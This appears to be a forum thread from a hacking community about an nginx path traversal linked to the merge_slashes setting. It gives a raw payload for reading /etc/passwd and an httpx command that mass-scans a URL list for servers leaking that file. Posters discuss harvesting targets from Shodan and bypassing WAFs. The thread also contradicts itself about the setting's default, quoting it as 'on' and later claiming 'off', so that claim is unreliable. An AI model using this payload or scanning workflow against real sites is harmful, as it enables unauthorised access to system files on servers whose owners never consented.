Payload : GET ///////../../../etc/passwd
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Remote Nginx Merge slashes Path traversal
- Автор темы 0x0021h
- Дата начала
any requirements for this vulnerability to work ?
nginx version ?
- Автор темы
- Добавить закладку
- #4
A vulnerability in the remote Nginx server could cause the server to merge /slash slash/ together causing what should have protected the website from a directory traversal vulnerability into a vulnerable server.
http://NGINX.org/en/docs/http/ngx_http_core_module.html#merge_slashes
Enables or disables compression of two or more adjacent slashes in a URI into a single slash.
When the merge_slashes configuration is turned on, using multiple slashes ‘///’ did not allow us to exploit that vulnerability successfully.
http://NGINX.org/en/docs/http/ngx_http_core_module.html#merge_slashes
Enables or disables compression of two or more adjacent slashes in a URI into a single slash.
Код:
Syntax: merge_slashes on | off;
Default: merge_slashes on;
Context: http, serverWhen the merge_slashes configuration is turned on, using multiple slashes ‘///’ did not allow us to exploit that vulnerability successfully.
- Автор темы
- Добавить закладку
- #5
httpx -l url.txt -path "///////../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:'
WAF maybe any bypass method ? and one more thing that url.txt, where you guys get websites url ? like from shodan or any other source ? or just random ?
- Автор темы
- Добавить закладку
- #7
get it from shodan or other cyberspace tools.
ok thxx
what version of ngnix is this vuln to?
It should work on all the nginx versions up to the latest builds as this is a misconfiguration issue.
However, by default, the value is set to 'off' so will work only on specific cases.
However, by default, the value is set to 'off' so will work only on specific cases.
got it thanks